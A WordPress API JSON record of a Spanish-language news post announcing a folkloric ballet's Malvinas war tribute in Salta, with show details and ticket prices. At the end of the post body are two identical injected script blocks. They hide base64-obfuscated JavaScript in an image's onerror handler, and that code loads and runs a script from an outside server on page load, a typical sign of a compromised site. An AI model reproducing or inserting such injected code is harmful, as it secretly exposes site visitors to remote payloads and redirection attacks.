{"id":3885,"date":"2024-03-21T10:34:01","date_gmt":"2024-03-21T13:34:01","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3885"},"modified":"2025-08-13T23:57:54","modified_gmt":"2025-08-14T02:57:54","slug":"llega-la-ultima-carta-un-homenaje-de-malvinas-por-el-ballet-folklorico-de-la-provincia","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3885","title":{"rendered":"Llega \u201cLa \u00faltima carta\u201d un homenaje de Malvinas por El Ballet Folkl\u00f3rico de la Provincia"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-58cc1bffc03e02b52814bef1659b2de9\" style=\"background-color:#950851\"><em>Ser\u00e1 el pr\u00f3ximo 6 de abril en la Casa de la Cultura. Es una obra que narra a trav\u00e9s de la danza, el teatro y el arte, postales sobre la guerra de Malvinas<\/em><\/h3>\n\n\n\n<p>El cuerpo art\u00edstico de la Provincia \u201cGral. Mart\u00edn Miguel de G\u00fcemes\u201d se prepara para su pr\u00f3xima presentaci\u00f3n el 6 de abril a las 21 hs en Casa de la Cultura. La obra contar\u00e1 con coreograf\u00eda de su director titular, Daniel Espoz y del core\u00f3grafo Germ\u00e1n Bonetto como director invitado.<\/p>\n\n\n\n<p>&nbsp;\u201cLa \u00daltima Carta\u201d es una obra que narra a trav\u00e9s de la danza, el teatro y el arte, postales sobre la guerra de Malvinas. Una madre, una esposa, amigos que despiden a aquel muchacho de tan solo dieciocho a\u00f1os notificado en Marzo de 1982 como uno de los soldados que viajar\u00eda a defender la Patria.<\/p>\n\n\n\n<p>Entre la inocencia propia de su edad, entre el dolor y miedo al vivir la realidad, aquel h\u00e9roe ca\u00eddo en combate, en alg\u00fan momento de esos terribles 74 d\u00edas le escribe a su madre sin saber que ser\u00eda la \u00faltima carta que hasta el d\u00eda de hoy no dejar\u00e1 de leer.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/11377-llega-la-ultima-carta-un-homenaje-de-malvinas-por-el-ballet-folklorico-de-la-provincia.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/11377-llega-la-ultima-carta-un-homenaje-de-malvinas-por-el-ballet-folklorico-de-la-provincia.jpg\" alt=\"Llega \u201cLa \u00faltima carta\u201d un homenaje de Malvinas por El Ballet Folkl\u00f3rico de la Provincia\" style=\"width:349px;height:auto\"\/><\/a><\/figure><\/div>\n\n\n<p>Una herida que sigue abierta, decenas de historias que no pudimos escuchar, cientos de familias que siguen esperando el reconocimiento de aquellos familiares \u201csolo reconocidos por Dios\u201d, porque es una deuda que se les debe, porque es el respeto que se merecen ellos, nuestros H\u00e9roes de Malvinas.<\/p>\n\n\n\n<p>Entrada general $2.000, pr\u00f3ximamente en venta en www.saltaticket.gob.ar y en boleter\u00eda del Teatro Provincial. Entradas sin cargo para estudiantes y adultos mayores exclusivamente en la boleter\u00eda del Teatro.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/llega-la-ultima-carta-un-homenaje-de-malvinas-por-el-ballet-folklorico-de-la-provincia-94743\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretaria de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Ser\u00e1 el pr\u00f3ximo 6 de abril en la Casa de la Cultura. Es una obra que narra a trav\u00e9s de la danza, el teatro y el arte, postales sobre la guerra de Malvinas El cuerpo art\u00edstico de la Provincia \u201cGral. Mart\u00edn Miguel de G\u00fcemes\u201d se prepara para su pr\u00f3xima presentaci\u00f3n el 6 de abril a [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3886,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14],"tags":[],"class_list":{"0":"post-3885","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3885"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3885"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3885\/revisions"}],"predecessor-version":[{"id":6814,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3885\/revisions\/6814"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3886"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3885"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3885"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3885"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}